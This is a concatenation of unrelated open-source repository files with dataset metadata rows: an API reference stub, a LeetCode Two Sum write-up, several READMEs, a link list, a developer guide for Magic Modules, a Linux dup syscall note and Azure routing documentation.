- Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization.ReturnLocationPrintParameter
dev_langs:
- CSharp
- C++
- VB
---
# ReturnLocationPrintParameter Class
**Namespace:** [Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization](microsoft-dynamics-commerce-runtime-transactionservice-serialization-namespace.md)
**Assembly:** Microsoft.Dynamics.Commerce.Runtime.TransactionService (in Microsoft.Dynamics.Commerce.Runtime.TransactionService.dll)
## Syntax
``` vb
'Declaration
<SerializableAttribute> _
Public Class ReturnLocationPrintParameter
'Usage
Dim instance As ReturnLocationPrintParameter
```
``` csharp
[SerializableAttribute]
public class ReturnLocationPrintParameter
```
``` c++
[SerializableAttribute]
public ref class ReturnLocationPrintParameter
```
## Inheritance Hierarchy
[System.Object](https://technet.microsoft.com/en-us/library/e5kfa45b\(v=ax.60\))
Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization.ReturnLocationPrintParameter
## Thread Safety
Any public static (Shared in Visual Basic) members of this type are thread safe. Any instance members are not guaranteed to be thread safe.
## See Also
#### Reference
[Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization Namespace](microsoft-dynamics-commerce-runtime-transactionservice-serialization-namespace.md)
| 33.087719 | 171 | 0.827678 | yue_Hant | 0.748109 |
fa63d7f797558c6f3da5215de7b1212a43cbe05b | 4,634 | md | Markdown | posts/leetcode1.md | yanglr/LeetCodeOJ | 27dd1e4a2442b707deae7921e0118752248bef5e | [
"MIT"
] | 45 | 2021-07-25T00:45:43.000Z | 2022-03-24T05:10:43.000Z | posts/leetcode1.md | yanglr/LeetCodeOJ | 27dd1e4a2442b707deae7921e0118752248bef5e | [
"MIT"
] | null | null | null | posts/leetcode1.md | yanglr/LeetCodeOJ | 27dd1e4a2442b707deae7921e0118752248bef5e | [
"MIT"
] | 15 | 2021-07-25T00:40:52.000Z | 2021-12-27T06:25:31.000Z | ### [1. 两数之和](https://leetcode-cn.com/problems/two-sum/)
<table> <tr> <td bgcolor=white> ● 难度: </td> <td bgcolor=#5cb85c width=8.5%><font color=white>简单</font></td> <td bgcolor=white width=79%></td> </tr></table>
给定一个整数数组 `nums` 和一个整数目标值 `target`,请你在该数组中找出 **和为目标值** *`target`* 的那 **两个** 整数,并返回它们的数组下标。
你可以假设每种输入只会对应一个答案。但是,数组中同一个元素在答案里不能重复出现。
你可以按任意顺序返回答案。
<br/>
**示例 1:**
```
输入:nums = [2,7,11,15], target = 9
输出:[0,1]
解释:因为 nums[0] + nums[1] == 9 ,返回 [0, 1] 。
```
**示例 2:**
```
输入:nums = [3,2,4], target = 6
输出:[1,2]
```
**示例 3:**
```
输入:nums = [3,3], target = 6
输出:[0,1]
```
**提示:**
- `2 <= nums.length <= 104`
- `-109 <= nums[i] <= 109`
- `-109 <= target <= 109`
- **只会存在一个有效答案**
**进阶:** 你可以想出一个时间复杂度小于 O(n<sup>2</sup>) 的算法吗?
<br/>
### 英文题目: 2 sum (Two sum)
Given an array of integers `nums` and an integer `target`, return _indices of the two numbers such that they add up to `target`.
You may assume that each input would have **_exactly_ one solution**, and you may not use the _same_ element twice.
You can return the answer in any order.
<br/>
**Example 1:**
**Input:** nums = [2,7,11,15], target = 9
**Output:** [0,1]
**Explaination:** Because nums[0] + nums[1] == 9, we return [0, 1].
**Example 2:**
**Input:** nums = [3,2,4], target = 6
**Output:** [1,2]
**Example 3:**
**Input:** nums = [3,3], target = 6
**Output:** [0,1]
**Constraints:**
- `2 <= nums.length <= 103`
- `-109 <= nums[i] <= 109`
- `-109 <= target <= 109`
- **Only one valid answer exists.**
### 分析:
**方法1**: 暴力法,复杂度O(n^2),会TLE(超时).
**方法2**: 双指针法, 固定一个, 找另一个. 发现第一次出现`nums[i] + nums[j] == target`就返回结果.
**方法3**: hashmap查表,在表中找 target - 当前循环变量i对应的那个数。用一个哈希表(C++中用unordered_map, C#中用dictionary, Python中用dict,Java中可以直接用HashMap),存储每个数对应的下标,复杂度O(n);
**方法4**: 快排 + 双指针
<br/>
### 方法2 AC代码:
```cpp
class Solution {
public:
vector<int> twoSum(vector<int>& nums, int target) {
vector<int> res(2);
// 双指针, 先固定一个
for (int i = 0; i < nums.size(); i++)
{
for (int j = i + 1; j < nums.size(); j++)
{
if (nums[i] + nums[j] == target)
{
res[0] = i;
res[1] = j;
return res;
}
}
}
return res;
}
};
```
### 方法3 AC代码:
```cpp
class Solution {
public:
vector<int> twoSum(vector<int> &nums, int target)
{
unordered_map<int, int> dict;
vector<int> result;
for(int i = 0; i < nums.size(); i++) {
dict[nums[i]] = i; // 顺序的map映射: value->index
}
for(int i = 0; i < nums.size(); i++)
{
int query = target - nums[i];
if(dict.find(query) != dict.end() && dict[query] > i) // dict[query] > i是为了防止重复计算
{
result.push_back(i);
result.push_back(dict[query]);
break;
}
}
return result;
}
};
```
### 方法3的另一种写法:
```cpp
class Solution {
public:
vector<int> twoSum(vector<int> &nums, int target)
{
unordered_map<int, int> dict;
vector<int> res(2,-1), emptyVect;
for(int i=0;i<nums.size();i++)
{
int query=target-nums[i];
if(dict.find(query)==dict.end()) dict[nums[i]]=i; // 逆序的map映射: value->index
else {
res[1]=i;
res[0]=dict[query];
return res;
}
}
return emptyVect;
}
};
```
### 方法4 AC代码:
- 定义一个struct, 存储 index 和 value
- 使用两个指针, l 和 r, l++, r--
left自增, right 自减
**注意**: 如果要在一个struct上调用STL中的sort方法,需要先为其定义好 compare 函数。
具体代码如下:
```cpp
typedef struct node{
int index;
int value;
node(){};
node(int i, int v) : index(i), value(v){}
} Node;
bool compare(const Node& a, const Node& b){
return a.value < b.value;
}
class Solution {
public:
vector<int> twoSum(vector<int> &nums, int target) {
int len = nums.size();
assert(len >= 2);
vector<int> ret(2, 0); // 初始化:ret包含2个值为0的元素
vector<Node> nums2(len);
for(int i = 0; i < len; i++){
nums2[i] = Node(i+1, nums[i]);
}
sort(nums2.begin(), nums2.end(), compare); // 在定义的struct上调用快排,T(n)=O(n*log(n))
int l = 0;
int r = len - 1;
while(l < r){
int sum = nums2[l].value + nums2[r].value;
if(sum == target){
ret[0] = min(nums2[l].index, nums2[r].index)-1; // 注意,这里需要减去1
ret[1] = max(nums2[l].index, nums2[r].index)-1;
break;
} else if(sum < target){
l++;
} else {
r--;
}
}
return ret; // 用两个指针来扫
}
};
```
| 19.803419 | 178 | 0.514027 | eng_Latn | 0.26792 |
fa64bedbaff7828a8f554f6f1117fb15c9c1d93a | 3,301 | md | Markdown | README.md | JoanChirinos/IDontReallyMindAnything | d06d4f512460db187bbf5c4be141f52f8e226255 | [
"MIT"
] | null | null | null | README.md | JoanChirinos/IDontReallyMindAnything | d06d4f512460db187bbf5c4be141f52f8e226255 | [
"MIT"
] | null | null | null | README.md | JoanChirinos/IDontReallyMindAnything | d06d4f512460db187bbf5c4be141f52f8e226255 | [
"MIT"
] | null | null | null | # Searching Through Matrix in O(n) Time
## Team IDontReallyMindAnything - Rohan Ahammed, Joan Chirinos, Soojin Choi, pd08
### Hypothesis
We predicted that we could formulate an algorithm that searches through a matrix sorted horizontally, left to right in ascending order, and vertically, top to bottom in ascending order, in linear time, or O(n). This was based on the various traces we have done through smaller n x n 2D arrays, in which the number of comparisons and passes through our algorithm was about 2n - 1. Due to the nature of Big O notation, this would be simplified to linear time.
### Background
For an unsorted array, you would do a simple linear search. The worst case for this is O(n^2). When a 1D array is sorted, you can take advantage of the fact that, given an element, all elements before it are less than or equal to the element and all elements after after it are greater than or equal to the element (you can do a binary search). The 2D array given is also sorted in the sense that, given any element, the elements to the left of it or above it (same array with lower index or prior arrays with same index) are less than the given element and the elements to the right or below it (same array with greater index or subsequent arrays with same index) are greater than the given element. We wanted to take advantage of this fact.
Our search method begins the search at the last index of the first row. It repeats the following steps until the element is found or the indices are out of bounds:
1. If the element you're on is the one you're searching for, return the coordinates as a String "(r, c)"
2. If the element you're on is greater than the one you're searching for, search the previous index of the same row
3. Else, search the same index of the next row
Eventually, the element will either be found, or the search will attempt to go out of bounds. If the search attempts to go out of bounds, "(-1, -1)" is returned to indicate that the element was not found.
### Experiment Methodology
To test this method, we designed a tester class. The main method of the class follows these steps:
1. For every number, n, starting at 10000 and ending at 20000 (counting up by 50) repeat the following 1050 times: time the search on an array of size n x n guaranteed to give the worst case time
2. Log the size of the matrix (n) and each time taken into a csv file
### Results
Afterwards, we used Microsoft Excel to graph the points on a "size of array vs. time taken" graph. We also used Excel to draw the line of best fit, which turned out to be linear.

### Conclusions
Based on the line of best fit, created using the data from our experiment, it is clear that the runtime of our algorithm is O(n), or linear time. This must be true because our data basically forms a line, which is indicative of this run time.
It is clear from the graph that there is some variance in the algorithm. We attributed this to background processes running on Joan's Macbook. Although he tried to close all background processes, some, such as Siri and Spotlight, don't close for long.
| 94.314286 | 742 | 0.774614 | eng_Latn | 0.999908 |
fa6524d228295041226032eba3f88df1fa39431f | 7,650 | md | Markdown | src/docs/lists-and-articles.md | cyrilbois/42 | a5c1ecb930b1915fe13cdf8039504b484d7f16e6 | [
"MIT"
] | null | null | null | src/docs/lists-and-articles.md | cyrilbois/42 | a5c1ecb930b1915fe13cdf8039504b484d7f16e6 | [
"MIT"
] | null | null | null | src/docs/lists-and-articles.md | cyrilbois/42 | a5c1ecb930b1915fe13cdf8039504b484d7f16e6 | [
"MIT"
] | null | null | null | # Lists, articles and essays
### HN
- [What do you self-host?](https://news.ycombinator.com/item?id=21235957)
- [How to get your IP unbanned on HN.](https://news.ycombinator.com/item?id=4761102)
- [What's the most valuable thing you can learn in an hour?](https://news.ycombinator.com/item?id=21581361)
- [How I Hacked Hacker News (with arc security advisory)](https://news.ycombinator.com/item?id=639976)
- [Ask HN: What do you do with your Raspberry Pi?](https://news.ycombinator.com/item?id=20264911)
- [Ask HN: What do you use to manage dotfiles?](https://news.ycombinator.com/item?id=11070797)
- [Ask HN: I'm a software engineer going blind, how should I prepare?](https://news.ycombinator.com/item?id=22918980)
- [Ask HN: Mind bending books to read and never be the same as before?](https://news.ycombinator.com/item?id=23151144)
- [Ask HN: Anyone know any funny programming jokes?](https://news.ycombinator.com/item?id=25850739)
### Reddit
- [What is the coolest website you’ve visited that no one knows about?](https://old.reddit.com/r/AskReddit/comments/f937om/what_is_the_coolest_website_youve_visited_that_no/)
- [What's the scariest space fact/mystery in your opinion?](https://old.reddit.com/r/AskReddit/comments/h0ijze/whats_the_scariest_space_factmystery_in_your/)
### Stack Overflow
- [c++ - The Definitive C++ Book Guide and List](https://stackoverflow.com/questions/388242/the-definitive-c-book-guide-and-list)
- [vi - Your problem with Vim is that you don't grok vi.](https://stackoverflow.com/a/1220118)
- [javascript - How does the “this” keyword work?](https://stackoverflow.com/questions/3127429/how-does-the-this-keyword-work)
- [python - What is the purpose of the word 'self'?](https://stackoverflow.com/questions/2709821/what-is-the-purpose-of-the-word-self)
- [date - Why does man print "gimme gimme gimme" at 00:30?](https://unix.stackexchange.com/questions/405783/why-does-man-print-gimme-gimme-gimme-at-0030)
### Linux
- [htop explained](https://peteris.rocks/blog/htop/) - Explanation of everything you can see in htop/top on Linux.
### Wikipedia
- Programming
- [Rubber duck debugging](https://en.wikipedia.org/wiki/Rubber_duck_debugging)
- [SOLID](https://en.wikipedia.org/wiki/SOLID)
- [Sockpuppet](<https://en.wikipedia.org/wiki/Sockpuppet_(Internet)>)
- [Piggybacking](<https://en.wikipedia.org/wiki/Piggybacking_(Internet_access)>)
- [HTTP 451](https://en.wikipedia.org/wiki/HTTP_451)
- [Conway's Game of Life](https://en.wikipedia.org/wiki/Conway's_Game_of_Life)
- [Doomsday rule](https://en.wikipedia.org/wiki/Doomsday_rule)
- [Turing machine](https://en.wikipedia.org/wiki/Turing_machine)
- [Turing completeness](https://en.wikipedia.org/wiki/Turing_completeness)
- [Editor War](https://en.wikipedia.org/wiki/Editor_war)
- [Infobesity](https://en.wikipedia.org/wiki/Information_overload)
- [Pale Blue Dot](https://en.wikipedia.org/wiki/Pale_Blue_Dot)
- [Year 2038 problem](https://en.wikipedia.org/wiki/Year_2038_problem)
- [Year 2000 problem](https://en.wikipedia.org/wiki/Year_2000_problem)
- [Rickrolling](https://en.wikipedia.org/wiki/Rickrolling)
- [1% Rule](<https://en.wikipedia.org/wiki/1%25_rule_(Internet_culture)>)
- [Zettelkasten](https://en.wikipedia.org/wiki/Zettelkasten)
- [Link Rot](https://en.wikipedia.org/wiki/Link_rot)
- [Webring](https://en.wikipedia.org/wiki/Webring)
- [Glossary of blogging](https://en.wikipedia.org/wiki/Glossary_of_blogging)
- [Heisenbug](https://en.wikipedia.org/wiki/Heisenbug)
- [Quine](<https://en.wikipedia.org/wiki/Quine_(computing)>)
- Technology
- [List of Google Easter eggs](https://en.wikipedia.org/wiki/List_of_Google_Easter_eggs)
- [List of Easter eggs in Tesla products](https://en.wikipedia.org/wiki/List_of_Easter_eggs_in_Tesla_products)
- [List of Internet phenomena](https://en.wikipedia.org/wiki/List_of_Internet_phenomena)
- Philosophy
- [Stoicism](https://en.wikipedia.org/wiki/Stoicism)
- [Confucius](https://en.wikipedia.org/wiki/Confucius)
- [List of cognitive biases](https://en.wikipedia.org/wiki/List_of_cognitive_biases)
- [Curse of knowledge](https://en.wikipedia.org/wiki/Curse_of_knowledge)
- [Autodidacticism](https://en.wikipedia.org/wiki/Autodidacticism) ([List of autodidacts](https://en.wikipedia.org/wiki/List_of_autodidacts))
- [Typoglycemia](https://en.wikipedia.org/wiki/Typoglycemia)
- [Philosophical razor](https://en.wikipedia.org/wiki/Philosophical_razor)
- [List of phobias](https://en.wikipedia.org/wiki/List_of_phobias)
- [Glossary of manias](https://en.wikipedia.org/wiki/Glossary_of_manias)
- [-phil-](https://en.wikipedia.org/wiki/-phil-)
- Literature
- [listopia | Goodreads](https://www.goodreads.com/list)
- [Science Fiction Technology Terms - NASA](https://er.jsc.nasa.gov/seh/SFTerms.html)
- [Constructed language](https://en.wikipedia.org/wiki/Constructed_language)
- [Toki Pona](https://en.wikipedia.org/wiki/Toki_Pona)
- [Erdős number](https://en.wikipedia.org/wiki/Erd%C5%91s_number)
- [Sturgeon's law](https://en.wikipedia.org/wiki/Sturgeon's_law)
### Miscellaneous
- Programming
- [Things Every Hacker Once Knew](http://www.catb.org/esr/faqs/things-every-hacker-once-knew/) - Eric S. Raymond
- [Teach Yourself Programming in Ten Years](http://www.norvig.com/21-days.html) - Peter Norwig
- [What Every Computer Scientist Should Know About Floating-Point Arithmetic](https://docs.oracle.com/cd/E19957-01/806-3568/ncg_goldberg.html) - Oracle docs.
- [Challenging projects every programmer should try](https://web.eecs.utk.edu/~azh/blog/challengingprojects.html)
- [How to store dotfiles - Atlassian](https://www.atlassian.com/git/tutorials/dotfiles)
- [Removing sensitive data from a repository - GitHub Help](https://help.github.com/en/articles/removing-sensitive-data-from-a-repository)
- [Keyboard shortcuts - GitHub Help](https://docs.github.com/en/get-started/using-github/keyboard-shortcuts)
- [Gmail Search Operators](https://support.google.com/mail/answer/7190)
- [Things You Didn't Know About GNU Readline](https://twobithistory.org/2019/08/22/readline.html)
- [syntax across languages](http://rigaux.org/language-study/syntax-across-languages.html)
- [Practice CTF List](http://captf.com/practice-ctf/) - Jordan Wiens
- [The 500 Greatest Albums of All Time - Rolling Stone](https://www.rollingstone.com/music/music-lists/best-albums-of-all-time-1062063/)
- [500 Greatest Songs of All Time - Rolling Stone](https://www.rollingstone.com/music/music-lists/500-greatest-songs-of-all-time-151127/)
- [How to Make a Crossword Puzzle - The New York Times](https://www.nytimes.com/2018/09/14/crosswords/how-to-make-a-crossword-puzzle-the-series.html)
- Technology
- [How to speak Silicon Valley: 53 essential tech-bro terms explained](https://www.theguardian.com/us-news/2019/jun/26/how-to-speak-silicon-valley-decoding-tech-bros-from-microdosing-to-privacy) - The Guardian.
- Mathematics
- [Doomsday Algorithm](http://rudy.ca/doomsday.html) - The Doomsday Algorithm gives the day of the week for any date (and you can do it in your head).
- [Common Errors in College Math](https://math.vanderbilt.edu/schectex/commerrs/)
- Philosophy
- [How to study philosophy as an amateur?](http://existentialcomics.com/blog) - Existential Comics
- [Why I Am Not a Christian by Bertrand Russell - The Bertrand Russell Society](https://users.drew.edu/~jlenz/whynot.html)
- Short stories
- [The Fable of the Dragon-Tyrant](https://www.nickbostrom.com/fable/dragon.html) - Nick Bostrom (2005)
- [The Monkey's Paw](https://en.wikipedia.org/wiki/The_Monkey%27s_Paw) - W. W. Jacobs (1902)
| 70.833333 | 212 | 0.747582 | yue_Hant | 0.401061 |
fa653116e8123d79e5ee06d31b6435b29d7a3eaf | 1,692 | md | Markdown | includes/virtual-network-create-udr-scenario-include.md | t-deman/azure-docs.fr-fr | 392b196ce8eafe24f4b4542c457315e535082eaf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | includes/virtual-network-create-udr-scenario-include.md | t-deman/azure-docs.fr-fr | 392b196ce8eafe24f4b4542c457315e535082eaf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | includes/virtual-network-create-udr-scenario-include.md | t-deman/azure-docs.fr-fr | 392b196ce8eafe24f4b4542c457315e535082eaf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Fichier Include
description: Fichier Include
services: virtual-network
author: rockboyfor
ms.service: virtual-network
ms.topic: include
origin.date: 04/13/2018
ms.date: 06/11/2018
ms.author: v-yeche
ms.custom: include file
ms.openlocfilehash: 40b81904daabfdad7e45571d8ab86cf32cac8964
ms.sourcegitcommit: 3102f886aa962842303c8753fe8fa5324a52834a
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 04/23/2019
ms.locfileid: "60743357"
---
## <a name="scenario"></a>Scénario
Pour mieux illustrer la création d’itinéraires définis par l’utilisateur, ce document utilise le scénario suivant :

Dans ce scénario, vous créez un itinéraire défini par l’utilisateur pour le *sous-réseau frontal* et un autre pour le *sous-réseau principal*, comme suit :
* **UDR-FrontEnd**. L’itinéraire frontal défini par l’utilisateur est appliqué au sous-réseau *FrontEnd* et contient un itinéraire :
* **RouteToBackend**. Cet itinéraire envoie tout le trafic sur le sous-réseau principal à la machine virtuelle **FW1**.
* **UDR-BackEnd**. L’UDR principal est appliqué au sous-réseau *BackEnd* et contient un itinéraire :
* **RouteToFrontend**. Cet itinéraire envoie tout le trafic sur le sous-réseau frontal à la machine virtuelle **FW1**.
La combinaison de ces itinéraires garantit que tout le trafic qui transite d’un sous-réseau à un autre est routé vers la machine virtuelle **FW1**, qui fait office d’équipement virtuel. Vous devez également activer le transfert IP pour la machine virtuelle **FW1**, afin qu’elle puisse recevoir le trafic destiné aux autres machines virtuelles.
| 52.875 | 344 | 0.782506 | fra_Latn | 0.933207 |
fa65407826a83c9cc5e82fda6e538dbaae7d273f | 626 | md | Markdown | blog/stories/2020/07/13/a141741.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 93 | 2016-06-02T15:40:14.000Z | 2022-02-02T20:02:08.000Z | blog/stories/2020/07/13/a141741.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 231 | 2016-06-02T15:21:23.000Z | 2022-02-18T20:48:20.000Z | blog/stories/2020/07/13/a141741.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 11 | 2017-06-27T11:58:01.000Z | 2021-06-21T00:55:07.000Z | What made me think of disappearing diners is <a href="https://twitter.com/markwallace/status/1282679073244876800">this post</a> about <a href="https://www.yelp.com/biz/blue-benn-diner-bennington-2">The Blue Benn</a> diner in <a href="https://www.google.com/maps/place/314+North+St,+Bennington,+VT+05201/@42.8852274,-73.1972987,3a,75y,228.92h,90t/data=!3m6!1e1!3m4!1sTl-nznGO66eNXqeOmCJmQg!2e0!7i16384!8i8192!4m5!3m4!1s0x89e0966265ae8659:0x188c0e512ed8fc25!8m2!3d42.8850919!4d-73.1974869">Bennington, VT</a> that's <a href="https://www.tpwrealestate.com/listing/4816195/314-north-bennington-vt-05201/">for sale</a> for $595K.
| 313 | 625 | 0.77476 | yue_Hant | 0.25233 |
fa658ed321f35a493069108a6b086c1b789396dd | 1,804 | md | Markdown | README.md | jsongraph/graphlib-json-graph | 28d0ac20736f2aa48e463f279d29e2257a8e7c3a | [
"0BSD"
] | 4 | 2016-06-16T20:47:39.000Z | 2021-06-16T22:37:21.000Z | README.md | jsongraph/graphlib-json-graph | 28d0ac20736f2aa48e463f279d29e2257a8e7c3a | [
"0BSD"
] | null | null | null | README.md | jsongraph/graphlib-json-graph | 28d0ac20736f2aa48e463f279d29e2257a8e7c3a | [
"0BSD"
] | null | null | null | # graphlib-json-graph
Converts json-graph definitions into graphlib graphs.
```
npm install --save graphlib-json-graph
```
## Example
```javascript
var toGraph = require("graphlib-json-graph");
var graphDefinition = {
graph: {
label: "Example graph",
nodes: [{
id: "1"
}, {
id: "2"
}],
edges: [{
id: "e1",
directed: true,
source: "1",
target: "2"
}]
}
};
var graph = toGraph(graphDefinition);
graph.nodes(); // ["1", "2"]
graph.edges(); // {v: "1", w: "2"}
```
## API
The module exports one function: `toGraph(graphDefinition)`.
`graphDefinition` is supposed to be an object that conforms with the [json graph specification](https://github.com/jsongraph/json-graph-specification#graphs-object).
The function returns either one, or a list of [graphlib graphs](https://github.com/cpettitt/graphlib/wiki).
The distinction is based on whether you have a `graphs` property or a `graph` property.
## Notes
- The graph is set to be a `multigraph` by default to support multiple edges that point to the same nodes
- If you do have multiple edges that connect the same nodes, you must provide an `id` property for them so that you can [differentiate them by name](https://github.com/cpettitt/graphlib/wiki/API-Reference#multigraphs)
- the `labels` for the nodes and edges in the graph are set to the objects in the definition JSON
## Testing
Is based on [mochajs](http://mochajs.org/)
- Clone the repo
- `npm install`
- `npm test`
## Contributing
Feel free to [raise an issue](https://github.com/jsongraph/graphlib-json-graph/issues) or [submit a pull request](https://github.com/jsongraph/graphlib-json-graph/pulls)
In terms of styling, please use tabs for indentation
| 29.57377 | 217 | 0.672949 | eng_Latn | 0.892517 |
fa661a9dfc3fd5476ae0ce5ed5e8d9a83471b580 | 8,073 | md | Markdown | DEVELOPER.md | edevil/magic-modules | 201625075699974f8afd5047c200ee77c2bde6c5 | [
"Apache-2.0"
] | null | null | null | DEVELOPER.md | edevil/magic-modules | 201625075699974f8afd5047c200ee77c2bde6c5 | [
"Apache-2.0"
] | null | null | null | DEVELOPER.md | edevil/magic-modules | 201625075699974f8afd5047c200ee77c2bde6c5 | [
"Apache-2.0"
] | null | null | null | # Developer Guide
All the information required for Magic Modules (MM) to compile a specific
product is usually contained within its folder under the [`products`](products/)
folder. For example all the sources for the Google Compute Engine are inside the
[`products/compute`](products/compute) folder.
When compiling a product you specify the path to the products folder with the
`-p` parameter.
Please refer to these documents for general guidelines on how to write Magic
Modules code:
- [GOVERNANCE][governance]
- [Template SDK][template-sdk]
## Anatomy of a Product
A product definition for a specific provider contains a few basic components:
1. Product definition: `api.yaml`
2. Provider dependent product definitions: `<provider>.yaml`
3. Examples
4. Tests
### Product definition: api.yaml
The `api.yaml` contains all the object definitions for the GCP product. It also
contains the relationships between objects.
It also includes other product specific information, such as product version and
API endpoint.
#### Resource
A resource is an object defined and supported by the product. For example a
virtual machine, a disk, a network, a container, a container cluster are all
resources from MM's point of view.
A resource defines some basic properties about the resource such as name,
endpoint name, as well as its properties and parameters.
- !ruby/object:Api::Resource
name: 'Address'
kind: 'compute#address'
base_url: projects/{{project}}/regions/{{region}}/addresses
exports:
...
description: |
...
parameters:
...
properties:
...
##### Resource / [ parameters | properties ]
Specifies fields that the user can specify to define the object and its desired
state.
> The main difference between a parameter and a property is that a parameter is
> not part of the object, and will be used by the user to convey data to the
> generated code, usually to help locate the object. Every property will be
> eventually persisted as fields of the remote object in GCP.
Required fields:
- `type`: Specifies the type of the parameter / property
- `name`: The user facing name of the parameter / property
- `description`: The description for the parameter / property
Optional fields:
- `required`: true|false indicating if the field if required to be specified by
the user
- `input`: true|false indicating if the field will be used as "input", which
means that the field will be used only during the _creation_ of the object
- `output`: true|false indicating that the field is produced and controlled by
the server. The user can use an output field to ensure the value matches
what's expected.
- `field`: In case we want the user facing name to be different from the
corresponding API property we can use `field` to map the user facing name
(specified by the `name` parameter) to the backend API (specified by the
`field` parameter)
Example:
- !ruby/object:Api::Type::ResourceRef
name: 'region'
resource: 'Region'
imports: 'name'
description: |
URL of the region where the regional address resides.
This field is not applicable to global addresses.
required: true
> Please describe these fields from the user's perspective and not from the API
> perspective. That will allow the generated documentation be useful for the
> provider user that should not care about how the internals work. This is a
> core strength of the MM paradigm: the user should neither need to know nor
> care how the backend works. All he cares is how to describe in a high-level,
> uniform and elegant way his dependencies.
>
> For example a in a virtual machine disk, do not say "disk: array or full URI
> (self link) to the disks". Instead you should say "disks: reference to a list
> disks to attach to the machine".
>
> Also avoid language or provider specific lingo in the product definitions.
>
> For example instead of saying "a hash array of name to datetime" say "a map
> from name to timestamps". While the former may be correct for a provider in
> Java it will not be in a Ruby or Python based output.
### Provider dependent product definitions: <provider>.yaml
Each provider has their own product specific definitions that are relevant and
necessary to properly build the product for such provider.
For example a Puppet provider requires to specify the Puppet Forge URL for the
module being created. That goes into the product `puppet.yaml`. Similarly a Chef
provider requires metadata about dependencies of other cookbooks. That goes into
the product `chef.yaml`.
Detailed provider documentation:
- [`puppet.yaml`][puppet-yaml] on how to create Puppet product definitions
- [`chef.yaml`][chef-yaml] on how to create Chef product definitions
### Examples
It is strongly encouraged to provide live, working examples to end users. It is
also good practice to test the examples to make sure they do not become stale.
To test examples you can use our `[end2end](tools/end2end)` mini framework.
## Types
When defining a property you have to specify its type. Although some products
may not care about types and may convert from/to strings, it is important to
know the type so the compiler can do the best job possible to validate the
input, ensure consistency, etc.
Currently MM supports the following types:
- `Api::Type::Array`: Represents an array of values. The type of the values is
identified by the `item\_type`property.
- `Api::Type::Boolean`: A boolean (true or false) value.
- `Api::Type::Constant`: A constant that will be passed to the API.
- `Api::Type::Double`: A double number.
- `Api::Type::Enum`: Input is allowed only from a fixed list of values,
specified by the `values` property.
- `Api::Type::Integer`: An integer number.
- `Api::Type::Long`: A long number
- Api::Type::NameValues
- `Api::Type::NestedObject`: A composite field, composed of inner fields. This
is used for structures that are nested.
- `Api::Type::ResourceRef`: A reference to another object described in the
product. This is used to create strong relationship binding between the
objects, where the generated code will make sure the object depended upon
exists. A `ResourceRef` also specifies which property from the dependent
object we are interested to fetch, by specifying the `resource` and `imports`
fields.
- `Api::Type::String`: A string field.
- `Api::Type::Time`: An RFC 3339 representation of a time stamp.
## Exports
When data needs to be read from another object that we depend on we use exports.
For example a virtual machine has many disks. When specifying the disks we do
not want the user to worry about which representation Google developers chose
for that object (is it the self\_link? is it just the disk name? is it the
zone+name?).
Instead we describe the relationship in `api.yaml` and let the generated code
deal with that. The user will only say "vm X uses disks [A, B, C]". As GCP VM
requires the disk self\_link the generated code will compute their values and
pass along.
All fields need to be explicitly exported before they can be imported and
dependent upon by other objects. This allows us to track and verify the
dependencies more reliably.
The following exports are allowed:
- `<property-name>`: By specifying the `name` of an existing property of the
object, we're allowing other objects to import it.
- `Api::Type::FetchedExternal`: Exports the version of the data that was
returned from the API. That's useful when the user specification of the
property is different from the representation coming from the API
- `Api::Type::SelfLink`: URI that represents the object
> To avoid overexposure and inefficient code, only export the fields you
> actively require to access from dependent objects, and practice housecleaning
> by removing exports if you change or remove an object that depends on it.
[puppet-yaml]: docs/puppet.yaml.md
[chef-yaml]: docs/chef.yaml.md
[governance]: GOVERNANCE.md
[template-sdk]: TEMPLATE_SDK.md
| 39.18932 | 80 | 0.75065 | eng_Latn | 0.99945 |
fa6635528d051f282e27cedfbed9ab147b9e3d79 | 977 | md | Markdown | src/basic_files/syscall-32-33-292-dup-dup2-dup3.md | farberbrodsky/syscall-book | bb30431a8115e28cd83d78d99da73b085380071f | [
"Unlicense"
] | 2 | 2022-01-22T13:37:46.000Z | 2022-01-25T08:46:07.000Z | src/basic_files/syscall-32-33-292-dup-dup2-dup3.md | farberbrodsky/syscall-book | bb30431a8115e28cd83d78d99da73b085380071f | [
"Unlicense"
] | null | null | null | src/basic_files/syscall-32-33-292-dup-dup2-dup3.md | farberbrodsky/syscall-book | bb30431a8115e28cd83d78d99da73b085380071f | [
"Unlicense"
] | null | null | null | # סיסקול 32, 33, 292 - dup, dup2, dup3
**הקדמה**: כל file descriptor שאנחנו מכירים (בתור מספר שאנחנו מעבירים כל פעם ל-read ו-write ולבסוף ל-close) מצביע ל-file description בקרנל. אותו ה-file description יכול להיות בשימוש בכמה מספרים שונים ואפילו מכמה פרוססים שונים כפי שנראה מאוחר יותר. כל file description מחזיק מידע כמו איפה המצביע שיש לנו ל-read ו-write נמצא בקובץ וכו'. ה-file descriptor הוא סתם מספר שאנחנו משתמשים כדי לאמר לקרנל באיזה file description אנחנו מעוניינים.
```c
int dup(int oldfd)
int dup2(int oldfd, int newfd)
int dup3(int oldfd, int newfd, int flags)
```
הסיסקול dup יוצר file descriptor חדש שמתאר את אותו ה-file description, בלי close on execute (שנראה למה זה שימושי בפרוססים בסיסיים).
ו-dup2 מקבל גם את המספר של ה-file descriptor החדש שאנחנו רוצים. אם הוא כבר תפוס אז dup2 סוגר אותו ומחליף בקובץ שלנו.
ו-dup3 דומה ל-dup2 אבל הוא עושה שגיאה אם olfd == newfd, ואפשר להעביר אליו O_CLOEXEC.
[עמוד ב-man](https://man7.org/linux/man-pages/man2/dup.2.html)
| 61.0625 | 435 | 0.765609 | heb_Hebr | 0.999811 |
fa670b93f92ea324d95cfffe10cc6dd99b79f834 | 610 | md | Markdown | _teaching/2012-Spring-teaching.md | SumathyS/SumathyS.github.io | 5e4e0e1bf4dc02b47c305c63a339ba28a0c0bc60 | [
"MIT"
